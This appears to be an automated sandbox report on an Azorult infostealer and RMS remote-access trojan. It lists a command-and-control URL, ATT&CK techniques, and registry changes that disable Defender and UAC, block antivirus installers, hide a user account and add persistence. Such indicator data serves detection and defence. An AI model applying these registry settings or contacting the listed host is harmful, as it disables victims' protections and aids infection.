azorult | hxxp://www[.]github[.]com

Analysis

max time kernel
1117s
max time network
1139s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
31/03/2025, 04:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://www.github.com

Score

10^/10

azorult rms defense_evasion discovery execution infostealer lateral_movement persistence privilege_escalation rat trojan upx

Malware Config

Extracted

Family

azorult

http://boglogov.site/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Azorult family
azorult

Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs

defense_evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Rms family
rms

UAC bypass 3 TTPs 5 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe

Windows security bypass 2 TTPs 1 IoCs

defense_evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
1212	net.exe
5760	net1.exe

Blocks application from running via registry modification 13 IoCs

Adds application to list of disallowed applications.

defense_evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Azorult.exe
Key created	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Azorult.exe

Downloads MZ/PE file 2 IoCs

flow	pid	Process
502	2648	msedge.exe
502	2648	msedge.exe

Modifies Windows Firewall 2 TTPs 23 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4092	netsh.exe
4352	netsh.exe
4956	netsh.exe
2572	netsh.exe
4636	netsh.exe
2408	netsh.exe
1608	netsh.exe
4956	netsh.exe
5836	netsh.exe
4796	netsh.exe
3312	netsh.exe
3892	netsh.exe
4260	netsh.exe
4904	netsh.exe
3884	netsh.exe
5464	netsh.exe
408	netsh.exe
5332	netsh.exe
5376	netsh.exe
3528	netsh.exe
5432	netsh.exe
4676	netsh.exe
5992	netsh.exe

Sets file to hidden 1 TTPs 3 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4164	attrib.exe
4812	attrib.exe
4636	attrib.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 21 IoCs

pid	Process
1144	butterflyondesktop.exe
4168	butterflyondesktop.tmp
1244	ButterflyOnDesktop.exe
2292	Azorult.exe
4092	wini.exe
3808	winit.exe
4028	rutserv.exe
5216	rutserv.exe
2808	rutserv.exe
2300	rutserv.exe
5688	rfusclient.exe
2088	rfusclient.exe
4856	cheat.exe
2316	taskhost.exe
4348	ink.exe
5144	P.exe
1384	rfusclient.exe
1144	R8.exe
1312	winlog.exe
4136	winlogon.exe
2228	Rar.exe

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5412	icacls.exe
3508	icacls.exe
3236	icacls.exe
5100	icacls.exe
1256	icacls.exe
5144	icacls.exe
1132	icacls.exe
5464	icacls.exe
4672	icacls.exe
3068	icacls.exe
5260	icacls.exe
1300	icacls.exe
2008	icacls.exe
3096	icacls.exe
3668	icacls.exe
4168	icacls.exe
2156	icacls.exe
5220	icacls.exe
3648	icacls.exe
1880	icacls.exe
1508	icacls.exe
2496	icacls.exe
996	icacls.exe
1468	icacls.exe
1608	icacls.exe
4500	icacls.exe
3648	icacls.exe
4936	icacls.exe
2824	icacls.exe
5576	icacls.exe
4132	icacls.exe
232	icacls.exe
5972	icacls.exe
488	icacls.exe
4352	icacls.exe
3016	icacls.exe
3464	icacls.exe
5952	icacls.exe
4856	icacls.exe
5052	icacls.exe
4484	icacls.exe
6088	icacls.exe
4832	icacls.exe
5200	icacls.exe
1908	icacls.exe
1952	icacls.exe
1788	icacls.exe
5384	icacls.exe
4476	icacls.exe
4796	icacls.exe
2360	icacls.exe
1116	icacls.exe
1788	icacls.exe
1108	icacls.exe
2360	icacls.exe
4972	icacls.exe
3144	icacls.exe
5380	icacls.exe
1028	icacls.exe
3308	icacls.exe
996	icacls.exe
3112	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop	butterflyondesktop.tmp

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5464	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 18 IoCs

Web Service

T1102

flow	ioc
91	raw.githubusercontent.com
93	raw.githubusercontent.com
494	raw.githubusercontent.com
554	raw.githubusercontent.com
600	iplogger.org
139	camo.githubusercontent.com
491	camo.githubusercontent.com
493	raw.githubusercontent.com
554	iplogger.org
138	camo.githubusercontent.com
492	camo.githubusercontent.com
502	raw.githubusercontent.com
551	raw.githubusercontent.com
588	raw.githubusercontent.com
597	raw.githubusercontent.com
602	raw.githubusercontent.com
92	raw.githubusercontent.com
587	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
555	ip-api.com

Modifies WinLogon 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000900000002a853-5589.dat	autoit_exe
behavioral1/files/0x001a00000002b5e3-5695.dat	autoit_exe
behavioral1/files/0x001c00000002b5c2-5799.dat	autoit_exe
behavioral1/memory/2744-5950-0x00000000001B0000-0x000000000029C000-memory.dmp	autoit_exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy	powershell.exe

Hide Artifacts: Hidden Users 1 TTPs 3 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4136-5915-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/4136-5893-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/files/0x001b00000002b612-5890.dat	upx
behavioral1/files/0x001b00000002af26-5944.dat	upx
behavioral1/memory/2744-5950-0x00000000001B0000-0x000000000029C000-memory.dmp	upx
behavioral1/memory/2744-5949-0x00000000001B0000-0x000000000029C000-memory.dmp	upx

Drops file in Program Files directory 22 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Zaxar	Azorult.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	Azorult.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	Azorult.exe
File created	C:\Program Files (x86)\Butterfly on Desktop\is-QGRH7.tmp	butterflyondesktop.tmp
File opened for modification	C:\Program Files\Malwarebytes	Azorult.exe
File opened for modification	C:\Program Files\COMODO	Azorult.exe
File opened for modification	C:\Program Files\Enigma Software Group	Azorult.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	Azorult.exe
File opened for modification	C:\Program Files\AVG	Azorult.exe
File created	C:\Program Files (x86)\Butterfly on Desktop\is-PMPJA.tmp	butterflyondesktop.tmp
File opened for modification	C:\Program Files (x86)\Microsoft JDX	Azorult.exe
File opened for modification	C:\Program Files\ByteFence	Azorult.exe
File opened for modification	C:\Program Files (x86)\360	Azorult.exe
File opened for modification	C:\Program Files\SpyHunter	Azorult.exe
File opened for modification	C:\Program Files (x86)\AVG	Azorult.exe
File opened for modification	C:\Program Files\Kaspersky Lab	Azorult.exe
File created	C:\Program Files (x86)\Butterfly on Desktop\unins000.dat	butterflyondesktop.tmp
File created	C:\Program Files (x86)\Butterfly on Desktop\is-ITAO0.tmp	butterflyondesktop.tmp
File created	C:\Program Files (x86)\Butterfly on Desktop\is-7UQPL.tmp	butterflyondesktop.tmp
File created	C:\Program Files\Common Files\System\iediagcmd.exe	Azorult.exe
File opened for modification	C:\Program Files\AVAST Software	Azorult.exe
File opened for modification	C:\Program Files (x86)\Butterfly on Desktop\unins000.dat	butterflyondesktop.tmp

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-ec\de\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-ec\fr-CA\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-tokenized-card\nl\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\wallet\wallet-tokenization-config.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\manifest.webapp.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\Notification\notification.html	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3848_472662291\_locales\my\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3848_472662291\128.png	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-notification\es\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-shared-components\pl\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\Mini-Wallet\miniwallet.bundle.js.LICENSE.txt	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3848_472662291\_locales\hy\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3848_1323895489\protocols.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-ec\el\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-ec\en-GB\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-hub\hu\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-notification\ja\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-shared-components\it\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-shared-components\nl\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3848_472662291\_locales\ko\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3848_472662291\_locales\en_US\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3848_472662291\_locales\si\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-ec\hu\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-notification\fi\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-shared-components\sv\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\Notification\notification.bundle.js	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\Notification\notification_fast.bundle.js	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_773610696\manifest.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\wallet.html	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3848_472662291\_locales\et\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3848_472662291\_locales\ro\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_728030799\LICENSE	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-hub\de\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-notification-shared\sv\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\wallet-icon.svg	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_773610696\deny_etld1_domains.list	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3848_472662291\_locales\am\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1627870440\edge_tracking_page_validator.js	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-ec\pt-PT\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-hub\ar\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-mobile-hub\es\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-mobile-hub\id\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-mobile-hub\it\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-ec\ar\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-notification\ar\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-mobile-hub\nl\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\Wallet-Checkout\load-ec-deps.bundle.js	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\manifest.fingerprint	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_728030799\manifest.fingerprint	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\app-setup.js	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-notification-shared\es\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\Wallet-Checkout\wallet-drawer.html	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3848_472662291\_locales\kn\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3848_472662291\_locales\it\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3848_472662291\_locales\en\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-hub\es\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-notification\ko\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3848_472662291\_locales\hr\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3848_472662291\_locales\sw\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3848_472662291\_locales\id\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3848_472662291\_locales\is\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_305022077\keys.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\json\i18n-hub\pt-BR\strings.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5824_1902131461\driver-signature.txt	msedge.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3228	sc.exe
5088	sc.exe
4856	sc.exe
5380	sc.exe
1116	sc.exe
5928	sc.exe
3012	sc.exe
2744	sc.exe
4852	sc.exe
1220	sc.exe
4796	sc.exe
2192	sc.exe
5052	sc.exe
1396	sc.exe
2764	sc.exe
3336	sc.exe
1468	sc.exe
5568	sc.exe
3312	sc.exe
1144	sc.exe
4176	sc.exe
2428	sc.exe
2688	sc.exe
4472	sc.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 3 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\butterflyondesktop.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Azorult (1).exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 63 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
